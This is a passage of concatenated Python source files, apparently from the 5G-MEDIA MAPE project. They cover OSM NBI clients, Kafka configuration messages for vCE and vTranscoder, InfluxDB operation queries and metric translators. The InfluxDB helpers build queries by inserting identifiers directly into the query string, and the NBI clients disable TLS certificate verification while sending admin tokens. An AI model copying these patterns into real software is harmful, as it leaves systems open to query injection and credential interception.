search_for_edge_cache (str): Search for scaled Edge vCache by given explicit name
Returns:
tuple(dict, int): The details of the VNF interfaces including the VDU index in the VNF
(
{
"edge": {
"user": {
"mac-address": "fa:16:3e:0c:94:7f",
"ip-address": "192.168.252.12",
"name": "ens6",
"ns-vld-id": "user"
},
"cache": {
"mac-address": "fa:16:3e:4d:b9:64",
"ip-address": "192.168.253.9",
"name": "ens7",
"ns-vld-id": "cache"
},
"management": {
"mgmt-vnf": "true",
"mac-address": "fa:16:3e:99:33:43",
"ip-address": "192.168.111.29",
"name": "ens3",
"ns-vld-id": "management"
}
},
"mid": {
"management": {
"ip-address": "192.168.111.13",
"ns-vld-id": "management",
"name": "ens3",
"mac-address": "fa:16:3e:02:f5:1c",
"mgmt-vnf": true
},
"cache": {
"ip-address": "192.168.253.12",
"name": "ens6",
"ns-vld-id": "cache",
"mac-address": "fa:16:3e:60:5d:9d"
},
"origin": {
"ip-address": "192.168.254.5",
"name": "ens7",
"ns-vld-id": "origin",
"mac-address": "fa:16:3e:0d:64:97"
}
}
},
<int|1>
)
"""
vdus_list = []
interfaces = {"mid": None, "edge": None}
edges_interfaces_all = {}
count_index = None
# Fetch the VNFs by given NS instance
token = bearer_token(OSM_ADMIN_CREDENTIALS.get('username'),
OSM_ADMIN_CREDENTIALS.get('password'))
vnf = Vnf(token)
response = vnf.get_list_by_ns(ns_uuid=ns_uuid)
vnfs_list = response.json()
# Keep the VDUs details
for vnf_instance in vnfs_list:
vdus_list += vnf_instance.get("vdur", [])
# Discover the interfaces of the proper scaled Edge VNF and Mid vCache
for vdu in vdus_list:
# Get Mid vCache net details
if vdu.get('vdu-id-ref', None) is not None and \
vdu['vdu-id-ref'] == search_for_mid_cache and \
vdu.get('count-index', None) == 0:
interfaces['mid'] = format_vdu_interfaces(vdu.get('interfaces', []))
# Get Edge vCache net details (the new one)
if vdu.get('vdu-id-ref', None) is not None and \
vdu['vdu-id-ref'] == search_for_edge_cache and \
vdu.get('count-index', -1) >= 0:
edges_interfaces_all[str(vdu['count-index'])] = format_vdu_interfaces(
vdu.get('interfaces', []))
# Keep the VDU with the greatest count-index
latest_vdu_index = max([int(k) for k in list(edges_interfaces_all.keys())])
count_index = latest_vdu_index
interfaces['edge'] = edges_interfaces_all[str(latest_vdu_index)]
return interfaces, count_index
def get_faas_vcdn_net_interfaces(ns_uuid, search_for_mid_cache="vCache_mid_vdu",
search_for_edge_cache="vCache_edge_vdu"):
""" Get the network interfaces of the VNF
Args:
ns_uuid (str): The NS uuid, in which the scaled VNF belongs to
search_for_mid_cache (str): Search for the Mid vCache by given explicit name
search_for_edge_cache (str): Search for scaled Edge vCache by given explicit name
Returns:
dict: The details of the VNF interfaces
(
{
"edge": None,
"mid": {
"management": {
"ip-address": "192.168.111.13",
"ns-vld-id": "management",
"name": "ens3",
"mac-address": "fa:16:3e:02:f5:1c",
"mgmt-vnf": true
},
"cache": {
"ip-address": "192.168.253.12",
"name": "ens6",
"ns-vld-id": "cache",
"mac-address": "fa:16:3e:60:5d:9d"
},
"origin": {
"ip-address": "192.168.254.5",
"name": "ens7",
"ns-vld-id": "origin",
"mac-address": "fa:16:3e:0d:64:97"
}
}
}
)
"""
vdus_list = []
interfaces = {"mid": None, "edge": None}
edges_interfaces_all = {}
count_index = None
# Fetch the VNFs by given NS instance
token = bearer_token(OSM_ADMIN_CREDENTIALS.get('username'),
OSM_ADMIN_CREDENTIALS.get('password'))
vnf = Vnf(token)
response = vnf.get_list_by_ns(ns_uuid=ns_uuid)
vnfs_list = response.json()
# Keep the VDUs details
for vnf_instance in vnfs_list:
vdus_list += vnf_instance.get("vdur", [])
# Discover the interfaces of the proper scaled Edge VNF and Mid vCache
for vdu in vdus_list:
# Get Mid vCache net details
if vdu.get('vdu-id-ref', None) is not None and \
vdu['vdu-id-ref'] == search_for_mid_cache and \
vdu.get('count-index', None) == 0:
interfaces['mid'] = format_vdu_interfaces(vdu.get('interfaces', []))
# Get Edge vCache net details (the new one)
if vdu.get('vdu-id-ref', None) is not None and \
vdu['vdu-id-ref'] == search_for_edge_cache and \
vdu.get('count-index', 0) > 0:
edges_interfaces_all[str(vdu['count-index'])] = format_vdu_interfaces(
vdu.get('interfaces', []))
return interfaces
def format_vdu_interfaces(interfaces_list):
""" Convert the list of VDU interfaces in a dict using the name of the interfaces as keys
Args:
interfaces_list (list): The list of VDU net interfaces. Each item is a dict.
Returns:
dict: The interfaces as dict
{
"user": {
"mac-address": "fa:16:3e:0c:94:7f",
"ip-address": "192.168.252.12",
"name": "ens6",
"ns-vld-id": "user"
},
"cache": {
"mac-address": "fa:16:3e:4d:b9:64",
"ip-address": "192.168.253.9",
"name": "ens7",
"ns-vld-id": "cache"
},
"management": {
"mgmt-vnf": "true",
"mac-address": "fa:16:3e:99:33:43",
"ip-address": "192.168.111.29",
"name": "ens3",
"ns-vld-id": "management"
}
}
"""
interfaces = {}
for interface in interfaces_list:
net_type = interface.get('ns-vld-id', None)
if net_type is None:
continue
interfaces[net_type] = interface
return interfaces
```
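`format_vdu_interfaces` keys every interface by its `ns-vld-id` and silently drops entries without one. A minimal usage sketch follows; the `actions.utils` import path is an assumption taken from the file header, and the data is illustrative only.
```python
# Hypothetical usage sketch for format_vdu_interfaces (illustrative data only).
from actions.utils import format_vdu_interfaces

sample_interfaces = [
    {"name": "ens3", "ns-vld-id": "management", "ip-address": "192.168.111.29",
     "mac-address": "fa:16:3e:99:33:43", "mgmt-vnf": "true"},
    {"name": "ens6", "ip-address": "10.0.0.5"},  # dropped: no "ns-vld-id" key
]

interfaces = format_vdu_interfaces(sample_interfaces)
print(interfaces["management"]["ip-address"])  # -> 192.168.111.29
print("cache" in interfaces)                   # -> False
```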
#### File: actions/vnf_configuration/vce.py
```python
from settings import KAFKA_CONFIGURATION_TOPIC
from utils import init_producer
class Configuration:
action_key = "vce"
def __init__(self, mac):
""" Configuration constructor
Args:
mac (str): The mac of the VDU
"""
self.mac = mac
self.action = {
'id': self.mac
}
def set_bitrate(self, bitrate):
""" Compose the configuration message to be sent on Kafka bus
Args:
bitrate (int): The profile to be applied in vCE
Returns:
bool: Whether the message was published in Kafka or not
Examples:
>>> from actions.vnf_configuration.vce import Configuration
>>> vdu_uuid = "12:12:32:12:a1"
>>> configuration = Configuration(vdu_uuid)
>>> bitrate = 2213
>>> configuration.set_bitrate(bitrate)
"""
completed = True
message = {
"mac": self.mac,
"action": {'bitrate': bitrate}
}
kafka_producer = init_producer()
operation = kafka_producer.send(KAFKA_CONFIGURATION_TOPIC, value=message,
key=self.action_key)
try:
operation.get(timeout=5)
except Exception as ex:
completed = False
finally:
kafka_producer.close()
return completed
```
#### File: actions/vnf_configuration/vtranscoder.py
```python
from settings import KAFKA_CONFIGURATION_TOPIC
from utils import init_producer
class Configuration:
action_key = "faas"
def __init__(self, ns_name, vnfd_name, vnf_index):
""" Configuration constructor
Args:
ns_name (str): The name of the NS (not the uuid)
vnfd_name (str): The name of the VNF descriptor
vnf_index (int): The index of the VNF
"""
self.ns_name = ns_name
self.vnfd_name = vnfd_name
self.vnf_index = vnf_index
self.action = {
'ns_name': self.ns_name,
'vnf_name': self.vnfd_name,
'vnf_index': '{}'.format(self.vnf_index)
}
def set_transcoder_profile(self, t_qualities):
""" Compose the configuration message to be sent on Kafka bus
The FaaS configuration service is used, as implemented by @IBM.
Args:
t_qualities (tuple): The qualities to be circulated in vTranscoder
Returns:
bool: Whether the message was published in Kafka or not
Indicative message:
{
"ns_name": "ns_name|string",
"vnf_name": "vnfd_name|name",
"vnf_index": "integer",
"action_params": {
"produce_profiles": [
0,
2,
4
]
}
}
Examples:
>>> from actions.vnf_configuration.vtranscoder import Configuration
>>> ns_name = "ns_name_xxxx"
>>> vnfd_name = "vnfd_name_xxx"
>>> vnf_index = 1
>>> configuration = Configuration(ns_name, vnfd_name, vnf_index)
>>> profiles = (0,2,4)
>>> configuration.set_transcoder_profile(profiles)
True
"""
completed = True
qualities = list(t_qualities)
# Append the profiles, proposed by the CNO
if not isinstance(qualities, list):
raise ValueError('Invalid input for vtranscoder qualities: {}'.format(qualities))
if not len(qualities):
raise ValueError('Empty list of vtranscoder qualities: {}'.format(qualities))
action_parameters = {
"produce_profiles": list(qualities)
}
self.action["action_params"] = action_parameters
kafka_producer = init_producer()
operation = kafka_producer.send(KAFKA_CONFIGURATION_TOPIC, value=self.action,
key=self.action_key)
try:
operation.get(timeout=5)
except Exception:
completed = False
finally:
kafka_producer.close()
return completed
def apply_placement(self, processor="cpu"):
""" Force vtranscoder placement: CPU vs GPU and vice versa.
The FaaS configuration service is used, as implemented by @IBM.
Args:
processor (str): cpu or gpu
Returns:
bool: Whether the message was published in Kafka or not
Indicative sample:
{
"ns_name": "sky_balls",
"vnf_name": "transcoder_2_8_4_vnfd",
"vnf_index": "1",
"invoker-selector": "cpu",
"action-antiaffinity": "true",
"action_params": {
"gpu_node": "0"
}
}
Examples:
>>> from actions.vnf_configuration.vtranscoder import Configuration
>>> ns_name = "ns_name_xxxx"
>>> vnfd_name = "vnfd_name_xxx"
>>> vnf_index = 1
>>> configuration = Configuration(ns_name, vnfd_name, vnf_index)
>>> configuration.apply_placement(processor="cpu")
True
"""
completed = True
gpu_node = "0" if processor == "cpu" else "1"
action_antiaffinity = "true"
self.action["invoker-selector"] = processor
self.action["action-antiaffinity"] = action_antiaffinity
action_parameters = dict()
action_parameters["gpu_node"] = gpu_node
self.action["action_params"] = action_parameters
kafka_producer = init_producer()
operation = kafka_producer.send(KAFKA_CONFIGURATION_TOPIC, value=self.action,
key=self.action_key)
try:
operation.get(timeout=5)
except Exception:
completed = False
finally:
kafka_producer.close()
return completed
def set_spectator_quality(self, cpu=True):
"""
The configuration is consumed by the spectators through the Kafka bus - not using
the FaaS Conf service.
Args:
cpu (bool): If True, request CPU placement for the spectators; otherwise GPU.
Returns:
bool: Whether the message was published in Kafka or not
"""
completed = True
processor = "cpu" if cpu else "gpu"
configuration_message = {
"annotations": [{
"key": "placement",
"value": {
"invoker-selector": {
"processor": processor
}
},
"action-antiaffinity": "true"
}]
}
self.action["action_params"] = configuration_message
kafka_producer = init_producer()
operation = kafka_producer.send(KAFKA_CONFIGURATION_TOPIC, value=self.action,
key=self.action_key)
try:
operation.get(timeout=5)
except Exception:
completed = False
finally:
kafka_producer.close()
return completed
```
#### File: emulator/consumer/configuration.py
```python
import json
from emulator.utils import init_consumer
from settings import KAFKA_CONFIGURATION_TOPIC
def main():
kafka_consumer = init_consumer("TEST_CONF_SUBSCRIBER1")
kafka_consumer.subscribe(pattern=KAFKA_CONFIGURATION_TOPIC)
for msg in kafka_consumer:
topic = msg.topic
try:
key = msg.key.decode('utf-8')
value = json.loads(msg.value.decode('utf-8'))
print("[Topic {}] key: {} has value {}".format(topic, key, value))
except AttributeError as e:
print("{}".format(e))
except json.decoder.JSONDecodeError:
print("Invalid message")
except Exception as e:
print("{}".format(e))
pass
if __name__ == '__main__':
main()
```
#### File: mape-executor/faasapi/ns_polling.py
```python
import logging.config
from httpclient.client import Client
from settings import LOGGING
logging.config.dictConfig(LOGGING)
logger = logging.getLogger("worker")
class NetworkServicePolling:
def __init__(self, osm_host, osm_faas_host, osm_faas_port, ns_name):
""" Initialize the object
Args:
osm_host (str): The OSM host
osm_faas_host (str): The FaaS VIM host (normally it is the same with OSM host)
osm_faas_port (str): The FaaS VIM port
ns_name (str): The NS name
"""
self.__client = Client()
self.osm_host = osm_host
self.faas_polling_host = osm_faas_host
self.faas_polling_ip = osm_faas_port
self.bootstrap_ingress_url = None
self.ns_name = ns_name
def get_vnfs_info(self):
""" Get information about the involved VNFs
Returns:
dict:
Response Example:
[
{
"vnf_name": "vcdn_bootstrap_vnfd.1",
"status": "ACTIVE",
"records": 0,
"ip_address": "0.0.0.0"
},
{
"vnf_name": "vcache_vnfd.2",
"status": "ACTIVE",
"records": 2,
"ip_address": "0.0.0.0"
},
{
"vnf_name": "vCache_mid_UC3_5GMEDIA.3",
"status": "ACTIVE",
"records": 0,
"ip_address": "192.168.111.19"
},
{
"vnf_name": "vCache_edge_UC3_5GMEDIA.4",
"status": "ACTIVE",
"records": 0,
"ip_address": "192.168.111.27"
}
]
"""
vnfs_list = []
endpoint = 'http://{}:{}/osm/{}'.format(self.faas_polling_host, self.faas_polling_ip,
self.ns_name)
request = self.__client.get(endpoint)
response_status = request.status_code
data = request.json()
for vnf in data['vnfs']:
vnf_name = vnf.get('vnf_name', None)
ip_address = vnf.get('ip_address', None)
status = vnf.get('status', None)
vim_info = vnf.get('vim_info', {})
records = 0
if 'records' in vim_info.keys():
records = len(vim_info['records'])
vnf_entry = {'vnf_name': vnf_name, 'ip_address': ip_address, 'status': status,
'records': records}
vnfs_list.append(vnf_entry)
return vnfs_list
def get_bootstrap_ingress_url(self):
""" Get the Ingress Url of the bootstrap serverless VNF
Returns:
str: the Ingress Url of the bootstrap serverless VNF
"""
bootstrap_ingress_url = None
endpoint = 'http://{}:{}/osm/{}'.format(self.faas_polling_host, self.faas_polling_ip,
self.ns_name)
request = self.__client.get(endpoint)
response_status = request.status_code
data = request.json()
if response_status != 200:
return bootstrap_ingress_url
for vnf in data['vnfs']:
ingress_url = vnf.get('vim_info', {}).get('IngressUrl', None)
if ingress_url is not None:
bootstrap_ingress_url = ingress_url
break
return bootstrap_ingress_url
def set_bootstrap_ingress_url(self, bootstrap_ingress_url):
"""
Set the Ingress Url of the bootstrap serverless VNF
"""
self.bootstrap_ingress_url = bootstrap_ingress_url
```
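A minimal sketch of how the polling class above might be driven; the host, port and NS name are placeholders, and the `faasapi.ns_polling` import path is inferred from the file header.
```python
# Hypothetical driver for NetworkServicePolling (placeholder endpoint values).
from faasapi.ns_polling import NetworkServicePolling

polling = NetworkServicePolling(osm_host="192.0.2.10",
                                osm_faas_host="192.0.2.10",
                                osm_faas_port="5001",
                                ns_name="vcdn_ns")

for vnf in polling.get_vnfs_info():
    print(vnf["vnf_name"], vnf["status"], vnf["records"])

ingress = polling.get_bootstrap_ingress_url()
if ingress is not None:
    polling.set_bootstrap_ingress_url(ingress)
```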
#### File: mape-executor/influx/queries.py
```python
import logging.config
from utils import init_influx_client, get_utcnow_timestamp, get_one_hour_ago
from settings import LOGGING
logging.config.dictConfig(LOGGING)
logger = logging.getLogger("worker")
def store_operation(operation_type, event_uuid, ns_name, ns_uuid, instance_number):
""" Store a faas operation like vcache spawn
Args:
operation_type (str): The type of the operation.
event_uuid (str): the identifier of the event
ns_name (str): the NS name
ns_uuid (str): the NS identifier
instance_number (int): The number of VNF instance
Returns:
None
"""
influx_client = init_influx_client()
timestamp = get_utcnow_timestamp()
operation = [
{
"measurement": "faas_operations",
"time": timestamp,
"tags": {
"operation_type": operation_type,
"event_uuid": event_uuid,
"ns_uuid": ns_uuid
},
"fields": {
"ns_name": ns_name,
"instance_number": int(instance_number)
}
}
]
influx_client.write_points(operation)
def get_first_operation(ns_uuid):
""" Fetch information for the least recently spawned event (within the last hour)
Args:
ns_uuid (str): The NS identifier
Returns:
dict: the event identifier and the FaaS VNF instance number
"""
event_uuid, instance_number = None, None
one_hour_ago = get_one_hour_ago()
try:
client = init_influx_client()
query = "select * from faas_operations where time> '{}' and ns_uuid='{}' order by time asc limit 1".format(
one_hour_ago, ns_uuid)
response = client.query(query)
series = response.raw['series']
serie = series[0]
values = serie['values']
value = values[0]
event_uuid = value[1]
instance_number = value[2]
except Exception as ex:
logger.error(ex)
finally:
return {"event_uuid": event_uuid, "instance_number": instance_number}
def get_last_operation(ns_uuid):
""" Fetch information for the most recently spawned event
Args:
ns_uuid (str): The NS identifier
Returns:
dict: the event identifier and the FaaS VNF instance number
"""
event_uuid, instance_number = None, 0
try:
client = init_influx_client()
query = "select * from faas_operations where ns_uuid='{}' order by time desc limit 1".format(
ns_uuid)
response = client.query(query)
series = response.raw['series']
serie = series[0]
values = serie['values']
value = values[0]
event_uuid = value[1]
instance_number = value[2]
except Exception as ex:
logger.error(ex)
finally:
return {"event_uuid": event_uuid, "instance_number": instance_number}
def delete_operation(event_uuid):
""" Drop a series from the faas_operations measurement by given the event uuid
Args:
event_uuid (str): The event uuid
Returns:
bool: True for success. Otherwise, False.
"""
client = init_influx_client()
query = "DROP SERIES FROM faas_operations WHERE event_uuid='{}'".format(event_uuid)
response = client.query(query)
return response.error is None
def delete_operation_by_ns(ns_uuid):
""" Drop a series from the faas_operations measurement by given the NS uuid
Args:
ns_uuid (str): The NS uuid
Returns:
bool: True for success. Otherwise, False.
"""
client = init_influx_client()
query = "DROP SERIES FROM faas_operations WHERE ns_uuid='{}'".format(ns_uuid)
response = client.query(query)
return response.error is None
```
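A round-trip sketch for the helpers above; the identifiers are illustrative placeholders and the `influx.queries` import path follows the file header.
```python
# Hypothetical round trip: store a FaaS operation, read the latest one, drop it.
from influx.queries import store_operation, get_last_operation, delete_operation

NS_UUID = "199b1fcd-eb32-4c6f-b149-34410acc2a32"   # placeholder NS identifier
EVENT_UUID = "0f9a3c7e-event"                      # placeholder event identifier

store_operation(operation_type="vcache_spawn", event_uuid=EVENT_UUID,
                ns_name="vcdn_ns", ns_uuid=NS_UUID, instance_number=1)

latest = get_last_operation(ns_uuid=NS_UUID)
print(latest)  # e.g. {'event_uuid': '0f9a3c7e-event', 'instance_number': 1}

delete_operation(event_uuid=EVENT_UUID)
```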
#### File: mape-executor/nbiapi/ns.py
```python
from settings import OSM_COMPONENTS, LOGGING
from httpclient.client import Client
import logging.config
import urllib3
import json
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
logging.config.dictConfig(LOGGING)
logger = logging.getLogger("osm")
class Ns(object):
"""NS Class.
Attributes:
bearer_token (str): The OSM Authorization Token
Args:
token (str): The OSM Authorization Token
"""
def __init__(self, token):
"""NS LCM Class Constructor."""
self.__client = Client(verify_ssl_cert=False)
self.bearer_token = token
def get_list(self):
"""Fetch a list of all NS Instances
Returns:
object: A list of NSs as a requests object
Examples:
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.ns import Ns
>>> from settings import OSM_ADMIN_CREDENTIALS
>>> token = bearer_token(OSM_ADMIN_CREDENTIALS.get('username'), OSM_ADMIN_CREDENTIALS.get('password'))
>>> ns = Ns(token)
>>> response = ns.get_list()
>>> print(response.json())
OSM Cli:
$ osm ns-list
"""
endpoint = '{}/osm/nslcm/v1/ns_instances'.format(OSM_COMPONENTS.get('NBI-API'))
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def get(self, ns_uuid=None):
"""Fetch details of a specific NS Instance
Args:
ns_uuid (str): The UUID of the NS to fetch details for
Returns:
object: A requests object
Examples:
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.ns import Ns
>>> from settings import OSM_ADMIN_CREDENTIALS
>>> token = bearer_token(OSM_ADMIN_CREDENTIALS.get('username'), OSM_ADMIN_CREDENTIALS.get('password'))
>>> ns = Ns(token)
>>> response = ns.get(ns_uuid='07048175-660b-404f-bbc9-5be7581e74de')
OSM Cli:
$ osm ns-show 07048175-660b-404f-bbc9-5be7581e74de
"""
endpoint = '{}/osm/nslcm/v1/ns_instances/{}'.format(OSM_COMPONENTS.get('NBI-API'), ns_uuid)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def scale_vnf(self, ns_uuid, vnf_index, scaling_group_name, scale_out=True):
""" Scale in or out in VNF level
Args:
ns_uuid (str): The NS uuid
vnf_index (int): The VNF index to be scaled
scaling_group_name (str): The name in the VNF scaling_group_descriptor
scale_out (bool): Decide scale in or out action. By default, scale out is performed.
Returns:
object: A requests object
Examples:
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.ns import Ns
>>> from settings import OSM_ADMIN_CREDENTIALS
>>> token = bearer_token(OSM_ADMIN_CREDENTIALS.get('username'), OSM_ADMIN_CREDENTIALS.get('password'))
>>> ns = Ns(token)
>>> response = ns.scale_vnf(ns_uuid="199b1fcd-eb32-4c6f-b149-34410acc2a32", vnf_index=2, scaling_group_name="scale_by_one", scale_out=False)
OSM Cli:
$ osm vnf-scale <ns_uuid> <vnf_index> --scale-in # scale in
Scaling group: <scaling_group_name>
$ osm vnf-scale <ns_uuid> <vnf_index> --scale-out # scale out (default)
Scaling group: <scaling_group_name>
"""
endpoint = '{}/osm/nslcm/v1/ns_instances/{}/scale'.format(OSM_COMPONENTS.get('NBI-API'), ns_uuid)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
# Set value based on scale action
scale_action = "SCALE_IN"
if scale_out:
scale_action = "SCALE_OUT"
payload = {
"scaleVnfData": {
"scaleVnfType": scale_action,
"scaleByStepData": {
"member-vnf-index": str(vnf_index),
"scaling-group-descriptor": str(scaling_group_name)
}
},
"scaleType": "SCALE_VNF"
}
response = self.__client.post(endpoint, headers, payload=json.dumps(payload))
logger.debug("Request `POST {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def terminate(self, ns_uuid=None):
"""Terminate a NS Instance.
Args:
ns_uuid (str): The UUID of the NS to terminate
Returns:
response (object): A requests object
Examples:
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.ns import Ns
>>> from settings import OSM_ADMIN_CREDENTIALS
>>> token = bearer_token(OSM_ADMIN_CREDENTIALS.get('username'), OSM_ADMIN_CREDENTIALS.get('password'))
>>> ns = Ns(token)
>>> response = ns.terminate(ns_uuid='07048175-660b-404f-bbc9-5be7581e74de')
"""
endpoint = '{}/osm/nslcm/v1/ns_instances/{}/terminate'.format(OSM_COMPONENTS.get('NBI-API'), ns_uuid)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.post(endpoint, headers)
logger.debug("Request `POST {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
```
#### File: mape-executor/nbiapi/user.py
```python
from settings import OSM_COMPONENTS, LOGGING
from httpclient.client import Client
import logging.config
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
logging.config.dictConfig(LOGGING)
logger = logging.getLogger("osm")
class User(object):
"""Description of User class"""
def __init__(self, token):
"""Constructor of User class"""
self.__client = Client(verify_ssl_cert=False)
self.bearer_token = token
def get_list(self):
"""Get the list of the registered users in OSM r4
Returns:
obj: a requests object
Examples:
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.user import User
>>> from settings import OSM_ADMIN_CREDENTIALS
>>> token = bearer_token(OSM_ADMIN_CREDENTIALS.get('username'), OSM_ADMIN_CREDENTIALS.get('password'))
>>> user = User(token)
>>> response = user.get_list()
>>> print(response.json())
"""
endpoint = '{}/osm/admin/v1/users'.format(OSM_COMPONENTS.get('NBI-API'))
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
return response
def get(self, username=None):
"""Get details of a user in OSM r4 by given username
Returns:
obj: a requests object
Examples:
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.user import User
>>> from settings import OSM_ADMIN_CREDENTIALS
>>> token = bearer_token(OSM_ADMIN_CREDENTIALS.get('username'), OSM_ADMIN_CREDENTIALS.get('password'))
>>> user = User(token)
>>> response = user.get(username="admin")
>>> print(response.json())
"""
endpoint = '{}/osm/admin/v1/users/{}'.format(OSM_COMPONENTS.get('NBI-API'), username)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
return response
``` |
{
"source": "5g-media/mape-translation",
"score": 2
} |
#### File: mape-translation/translator/opennebula.py
```python
from translator.basemetric import BaseMetric
from translator.exceptions import OsmInfoNotFound
from translator.utils import get_vdu_details, opennebula_metrics
import copy
class Metric(BaseMetric):
def __init__(self, raw_metric, source="opennebula"):
self.source = source
self.raw_metric = raw_metric
self.supported_metrics = opennebula_metrics()
super().__init__()
def get_metric(self):
"""Format the metric data.
Note: In the case of OpenNebula, the structure is already in the proper format.
Thus, no transformation is needed.
Returns:
dict: the metric including the name, type, unit, timestamp and value
"""
new_metric = copy.deepcopy(self.raw_metric)
if 'vdu_uuid' in new_metric.keys():
del new_metric['vdu_uuid']
new_metric['name'] = new_metric['type']
new_metric['type'] = self.get_metric_type()
return new_metric
def get_metric_type(self):
"""Get the type of the metric
Returns:
str: the type of the metric
"""
search_for_metric = self.raw_metric['type']
if search_for_metric in self.supported_metrics.keys():
return self.supported_metrics[search_for_metric].get('type', "gauge")
return "unknown"
def get_translation(self, vdu_uuid=None):
"""Generate and return a common data model for each type of metric.
Args:
vdu_uuid (str): The vdu uuid. Actually, it maps to the container ID
Returns:
dict: A common data model for each type of metric.
"""
return get_vdu_details(vdu_uuid, self.raw_metric, source=self.source)
```
#### File: mape-translation/translator/openstack.py
```python
from translator.basemetric import BaseMetric
from translator.utils import get_vdu_details
from translator.exceptions import OsmInfoNotFound
class Metric(BaseMetric):
"""Constructor"""
def __init__(self, raw_metric, source="openstack"):
self.source = source
self.raw_metric = raw_metric
super().__init__()
def get_metric(self):
"""Format the metric data
Returns:
dict: the metric including the name, type, unit, timestamp and value
"""
timestamp = self.raw_metric.get("timestamp", None)
if timestamp is not None and not timestamp.endswith('Z'):
timestamp = "{}Z".format(timestamp)
metric = {
"name": self.raw_metric.get("counter_name", None),
"type": self.raw_metric.get("counter_name", None),
"value": self.raw_metric.get("counter_volume", None),
"unit": self.raw_metric.get("counter_unit", None),
"timestamp": timestamp
}
return metric
def get_translation(self, vdu_uuid):
"""Generate and return a common data model for each type of metric.
Args:
vdu_uuid (str): The vdu uuid
Returns:
dict: A common data model for each type of metric. See more in the `samples/output.json` file.
"""
return get_vdu_details(vdu_uuid, self.raw_metric, source=self.source)
```
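An illustrative sample of the translation performed above; the field names follow the Ceilometer-style keys the class reads, and the values are made up.
```python
# Hypothetical OpenStack/Ceilometer-like sample and the flattened metric it yields.
from translator.openstack import Metric

raw_sample = {
    "counter_name": "cpu_util",
    "counter_volume": 12.5,
    "counter_unit": "%",
    "timestamp": "2019-05-06T10:15:00",
}

metric = Metric(raw_sample)
print(metric.get_metric())
# -> {'name': 'cpu_util', 'type': 'cpu_util', 'value': 12.5, 'unit': '%',
#     'timestamp': '2019-05-06T10:15:00Z'}
```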
#### File: mape-translation/translator/unikernels.py
```python
from translator.basemetric import BaseMetric
class Metric(BaseMetric):
def __init__(self, raw_metric):
self.raw_metric = raw_metric
super().__init__()
def get_data_model(self):
pass
```
#### File: 5g-media/mape-translation/vtranscoder3d_spectators.py
```python
import json
import logging.config
import redis
from kafka import KafkaConsumer, KafkaProducer
from kafka.errors import KafkaError
from settings import KAFKA_SERVER, KAFKA_CLIENT_ID, KAFKA_API_VERSION, KAFKA_MONITORING_TOPICS, \
LOGGING, KAFKA_GROUP_ID, KAFKA_TRANSLATION_TOPIC, REDIS_HOST, REDIS_PORT, REDIS_NFVI_DB, \
KAFKA_TIMEOUT, REDIS_EXPIRATION_SECONDS
from translator.utils import compose_redis_key, convert_bytes_to_str, \
discover_vdu_uuid_by_vnf_index, discover_vnf_uuid_by_vnfd_name_index
from translator.exceptions import VnfNotFound, OsmInfoNotFound, InvalidTranscoderId, \
VduUuidMissRedis
from translator.apps import vtranscoder3d_spectators
NFVI_OR_APP = "vtranscoder3d_spectators"
logging.config.dictConfig(LOGGING)
logger = logging.getLogger(NFVI_OR_APP)
def init_consumer(scope=None):
""" Init the Kafka consumer
# See more: https://kafka-python.readthedocs.io/en/master/apidoc/KafkaConsumer.html
Args:
scope (str): The origin of the metrics
Returns:
Iterator: The kafka consumer
"""
consumer = KafkaConsumer(bootstrap_servers=KAFKA_SERVER,
client_id=KAFKA_CLIENT_ID,
enable_auto_commit=True,
api_version=KAFKA_API_VERSION,
group_id=KAFKA_GROUP_ID[scope])
return consumer
def init_redis_connection():
""" Init the connection with Redis
# See more: https://redis-py.readthedocs.io/en/latest/
Returns:
object
"""
redis_conn = redis.Redis(host=REDIS_HOST,
port=REDIS_PORT,
db=REDIS_NFVI_DB)
return redis_conn
def main():
"""Main process"""
kafka_consumer = init_consumer(scope=NFVI_OR_APP)
kafka_consumer.subscribe(pattern=KAFKA_MONITORING_TOPICS[NFVI_OR_APP])
redis_conn = init_redis_connection()
# Consume the metrics coming from the vTranscoder3D spectators in the UC1.
# See Also: samples/uc1-vTranscoder3D/input/spectators_review.json
for msg in kafka_consumer:
topic = msg.topic
try:
payload = json.loads(msg.value.decode('utf-8', 'ignore'))
client_id = payload['client_id']
group_id = payload.get('group_id', "unknown")
timestamp = int(str(payload['timestamp']).split('.')[0])
incoming_streams = payload.get('incoming_streams', [])
spectator = {"client_id": client_id, "group_id": group_id}
for stream in incoming_streams:
try:
# Discover the VNF uuid by given the vnfd name & index and store it in redis
vnf_uuid = get_vnf_uuid(redis_conn, stream, topic)
# Get quality ID and original metrics
quality_id = stream.get("quality_id", None)
original_metrics = stream.get("metrics", [])
translator = vtranscoder3d_spectators.Metric(
client_id, group_id, timestamp, quality_id, original_metrics,
source=NFVI_OR_APP)
# Retrieve information related to the MANO including VIM, NS, VNF, VDU.
# A request will be performed in the Redis using the concatenation of
# topic, vdu_uuid as key. In case that no entry exists in the Redis, a
# request will be done in the OSM NBI API. After the successful retrieval,
# the MANO data are stored in the Redis for future usage.
mano_data = generate_payload(translator, redis_conn, topic, vnf_uuid)
stream_metrics = translator.get_metrics()
# Publish the value(s) in the Kafka bus, in translation-specific-topic
